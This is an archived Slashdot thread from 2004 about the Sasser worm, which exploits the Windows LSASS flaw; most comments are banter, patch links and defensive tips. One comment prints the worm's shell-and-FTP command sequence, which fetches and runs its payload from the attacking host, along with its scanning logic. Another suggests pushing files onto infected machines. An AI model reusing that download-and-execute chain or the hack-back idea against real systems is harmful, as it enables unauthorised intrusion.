Forgot your password?
typodupeerror
Security Operating Systems Software Windows

New Windows Worm on the Loose 622

Posted by michael
from the batten-down-your-ports dept.
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
This discussion has been archived. No new comments can be posted.

New Windows Worm on the Loose

Comments Filter:
  • ah... (Score:5, Funny)

    by Anonymous Coward on Saturday May 01, 2004 @12:41PM (#9028359)
    the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
    • Re:ah... (Score:5, Funny)

      by Interruach (680347) on Saturday May 01, 2004 @12:48PM (#9028414) Journal
      ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

      -- I see your nat box and raise you a proxy server.
    • Re:ah... (Score:5, Insightful)

      by Anonymous Coward on Saturday May 01, 2004 @12:50PM (#9028437)
      the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

      Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

  • by craXORjack (726120) on Saturday May 01, 2004 @12:42PM (#9028367)
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    What is this 'Windows Update' of which you speak?

    • by temojen (678985) on Saturday May 01, 2004 @12:47PM (#9028405) Journal
      I believe it's a cludgey microsoft variant of

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      except that it requires you to reboot several times and repeatedly interact with it.
      • Re:I Use X Windows (Score:5, Insightful)

        by SpectreGadget (465507) <jim@harryfamiDEGASly.com minus painter> on Saturday May 01, 2004 @01:43PM (#9028858) Homepage
        oh yes:

        "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

        isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.
      • Re:I Use X Windows (Score:3, Interesting)

        by reallocate (142797)
        I've never had Windows Update break a machine.

        All that "emerge" stuff breaks Gentoo, sooner or later, every time I've tried it.
    • by gnu-generation-one (717590) on Saturday May 01, 2004 @01:22PM (#9028700) Homepage
      "What is this 'Windows Update' of which you speak?"

      Full text, in case of slashdotting:
      "
      Thank you for your interest in Windows Update

      Windows Update is the online extension of Windows that helps you get the most out of your computer.

      You must be running a Microsoft Windows operating system in order to use Windows Update."
    • Re:I Use X Windows (Score:3, Insightful)

      by bkhl (189311)
      No, you're not:

      "The X Consortium requests that the following names be used when referring to this software:

      X
      X Window System
      X Version 11
      X Window System, Version 11
      X11

      X Window System is a trademark of X Consortium, Inc. "
  • Mutex Trapping (Score:5, Interesting)

    by Mr. Darl McBride (704524) on Saturday May 01, 2004 @12:42PM (#9028369)
    About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

    Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

    This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

    • For that matter, how hard would it be to restrict which programs are allowed to create files with runnable extensions without prompting?

      Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.

      • Re:Mutex Trapping (Score:5, Informative)

        by Anonymous Coward on Saturday May 01, 2004 @12:49PM (#9028427)
        You can set permissions in the registry per key.

        Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run
      • Re:Mutex Trapping (Score:5, Informative)

        by kyhwana (18093) <kyhwana@SELL-YOUR-SOUL.kyhwana.org> on Saturday May 01, 2004 @01:00PM (#9028519) Homepage
        Err, Startup Monitor [mlin.net] does just that.
        Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
      • Re:Mutex Trapping (Score:5, Informative)

        by Verteiron (224042) * on Saturday May 01, 2004 @01:03PM (#9028546) Homepage
        It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
    • Re:Mutex Trapping (Score:5, Informative)

      by The Raven (30575) * on Saturday May 01, 2004 @12:48PM (#9028412) Homepage
      Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.

      However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
    • Re:Mutex Trapping (Score:3, Informative)

      by Joe U (443617)
      Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

      Imagine running something complex like a database server. Dialog box fun.

      The virus writers will just use something else, like a file, if people tracked by mutex.
    • Re:Mutex Trapping (Score:3, Insightful)

      by SchnauzerGuy (647948)
      Creating a mutex at startup is by no means universal, and in fact, I doubt that very common at all.

      If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.
  • Huh? (Score:5, Funny)

    by grub (11606) <slashdot@grub.net> on Saturday May 01, 2004 @12:43PM (#9028371) Homepage Journal

    A new worm?
    May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
    Oh, there it is.
  • Removal Instructions (Score:5, Informative)

    by modifried (605582) on Saturday May 01, 2004 @12:44PM (#9028381) Homepage
    For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

    http://www.microsoft.com/security/incident/sasser. asp [microsoft.com]
  • by Quazion (237706) on Saturday May 01, 2004 @12:45PM (#9028382) Homepage
    Atleast for me as the local consumer support guy.

    Thanks Microsoft.
  • HAHA (Score:5, Funny)

    by D-Cypell (446534) on Saturday May 01, 2004 @12:45PM (#9028386)
    A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

    The add server must be based on Microsoft's new Irony.NET framework!
    • Re:HAHA (Score:5, Insightful)

      by yulek (202118) on Saturday May 01, 2004 @01:25PM (#9028719) Homepage Journal
      A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

      i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.
      • Re:HAHA (Score:5, Insightful)

        by Lothsahn (221388) <Lothsahn@@@SPAM_ ... u_bastardsyahocm> on Saturday May 01, 2004 @02:06PM (#9029033)
        Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

        They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.

        When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

        I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of it's normal speed, that's enough to take down almost any operation.

      • Re:HAHA (Score:5, Funny)

        by Anonymous Coward on Saturday May 01, 2004 @02:40PM (#9029261)
        but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

        And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.
  • by squall14716 (734306) on Saturday May 01, 2004 @12:47PM (#9028401)
    Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.
  • by Anonymous Coward on Saturday May 01, 2004 @12:49PM (#9028421)
    No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
  • Dang... (Score:5, Funny)

    by kennylives (27274) on Saturday May 01, 2004 @12:49PM (#9028428) Journal
    I have a Mac, you insensitive clod...
  • by TheUnFounded (731123) on Saturday May 01, 2004 @12:50PM (#9028435)
    You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
    • by Unknown Relic (544714) on Saturday May 01, 2004 @01:25PM (#9028723) Homepage
      Is that reduced timeline maybe an example of what this /. article [slashdot.org] from a couple months ago was talking about? Essentially it stated that a lot of the new worms are actually being caused by the reverse engineering of patches to easily find exploits. Some machines will of course be patched, but as we all know, a huge number of machines will remain unpatched and vulnerable for months to come. If this is the case, Microsoft can hardly be faulted for getting the patch out only a few days before the exploit, since it's the patch itself that potentially prompted its creation. The really interesting thing is that if this is the case and Microsoft is actually increasing their security efforts and releasing more patches, we could actually see more worms released targetting unpatched systems. For them, this really isn't a good situation to be in - the more they do correct problems with their operating systems, the more exploits hit the unpatched machines, making it look like their enhanced focus on security is a joke.
    • Came out the 13th if I recall correctly. 17 Days is still a really fast turn around though.
    • by mrneutron (61365) *
      Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).
  • by Anonymous Coward on Saturday May 01, 2004 @12:51PM (#9028441)
    In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
  • by Brian Dennehy (698379) on Saturday May 01, 2004 @12:54PM (#9028466) Homepage
    I'm impressed that they got the headline right!
  • by gnuman99 (746007) on Saturday May 01, 2004 @12:55PM (#9028479)
    Same old news about another worm. Nothing to see here, move along.

    Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

    If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.

  • How it works (Score:5, Informative)

    by mrneutron (61365) * on Saturday May 01, 2004 @12:57PM (#9028493)
    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

    open XXX.XXX.XXX.XXX 5554

    anonymous

    user

    bin

    get XXXXX_up.exe

    bye

    XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

    The IP addresses generated by the worm are distributed as follows:

    50% are completely random

    25% have the same first octet as the IP

    address of the infected host

    25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

    See:

    • http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html
  • Dammit... (Score:4, Interesting)

    by Saint Aardvark (159009) * on Saturday May 01, 2004 @12:58PM (#9028503) Homepage Journal
    I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
    • Re:Dammit... (Score:5, Interesting)

      by Nonesuch (90847) <nonesuch@@@msg...net> on Saturday May 01, 2004 @02:40PM (#9029259) Homepage Journal
      want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...
      LaBrea runs on FreeBSD too.

      I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.

      The Sasser worm starts 128 scanning threads to pseuod-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.

  • by brendanoconnor (584099) on Saturday May 01, 2004 @01:00PM (#9028520)
    Currently I'm running win2k on my main desktop fully patched, so this little problem doesn't really hurt me per say. With all the patches in place, my computer does some of the following things.

    1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thanks ms for this cause moz. owns.

    2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. Its not the colo scheme either, I tried MS default and it still didn't work.

    3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.

    All and all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unsuable. If I wasn't so damn lazy, this would of been done sooner.

    Brendan
  • by nazsco (695026) on Saturday May 01, 2004 @01:02PM (#9028535) Journal
    The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

    I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.
  • by C0rinthian (770164) on Saturday May 01, 2004 @01:04PM (#9028554)
    I REALLY hate working dial-up tech support.
    (ring)
    sigh....
  • by R_V_Winkle (186128) on Saturday May 01, 2004 @01:07PM (#9028578)
    In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

    Sasser generates traffic on TCP ports 445, 5554 and 9996.

    The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

    http://www.microsoft.com/technet/security/bullet in /MS04-011.mspx
  • by nazsco (695026) on Saturday May 01, 2004 @01:12PM (#9028616) Journal
    after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...

    and after some time, a windows pops up with the text:
    "The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
    "This software will *not be instaled*. Contact your system administrator."

    Ok, so i contact myself, and wonders what the hell?!?

    I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!

    but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.
  • That's funny. (Score:3, Interesting)

    by LordK3nn3th (715352) on Saturday May 01, 2004 @01:15PM (#9028642)
    Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?

    I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
  • by 6Yankee (597075) on Saturday May 01, 2004 @01:15PM (#9028643)

    How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

    Of course, then came the comments... :-)

  • by lazy_arabica (750133) on Saturday May 01, 2004 @01:17PM (#9028662) Homepage
    ... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

    Linux_Zealot says : 5 Insightful - I am using Linux now !
    M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
    security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
    n00b : -1 Troll - Windows Sucks !!!

    Well... That's just a little... repetitive ;-)
  • by donkeyoverlord (688535) on Saturday May 01, 2004 @01:21PM (#9028693) Homepage
    This is like a freaking death sentence considering everyone in town thinks that this is there own free computer tech support hot line.
  • This totally sucks. (Score:5, Interesting)

    by mark-t (151149) <markt@ l y n x.bc.ca> on Saturday May 01, 2004 @01:27PM (#9028736) Journal
    I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my lan when nobody was using any computers... A quick check with ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

    So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

    Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

    Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.

  • by rspress (623984) on Saturday May 01, 2004 @01:29PM (#9028751) Homepage
    I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
  • by BJZQ8 (644168) on Saturday May 01, 2004 @01:41PM (#9028837) Homepage Journal
    I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
  • by chrysalis (50680) on Saturday May 01, 2004 @01:49PM (#9028907) Homepage
    Here is an introduction to virus [00f.net] for non-windows users.
  • by imnoteddy (568836) on Saturday May 01, 2004 @02:22PM (#9029138)
    "Ha Ha!"
    Nelson, various Simpsons episodes
  • normally my home firewall (linux of course) logs about 100k bytes in messages per day (i have iptables log all dropped packets). Today alone its over 50 megs. Normally i have logrotate.conf set for weekly rotations, but i switched it to daily, and made sure my var partition has more then enough room (3 gigs free, so i think i am ok).
  • by sir_cello (634395) on Saturday May 01, 2004 @03:45PM (#9029685)

    Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.

  • by gorfie (700458) on Saturday May 01, 2004 @04:16PM (#9029859)
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".

    Running something other than Windows is not a good reason to ignore security.
  • Grounded (Score:4, Interesting)

    by krray (605395) * on Saturday May 01, 2004 @04:25PM (#9029924)
    And in other news ... Delta flights grounded today due to "a computer glitch"

    I have to wonder...

It's a poor workman who blames his tools.

Working...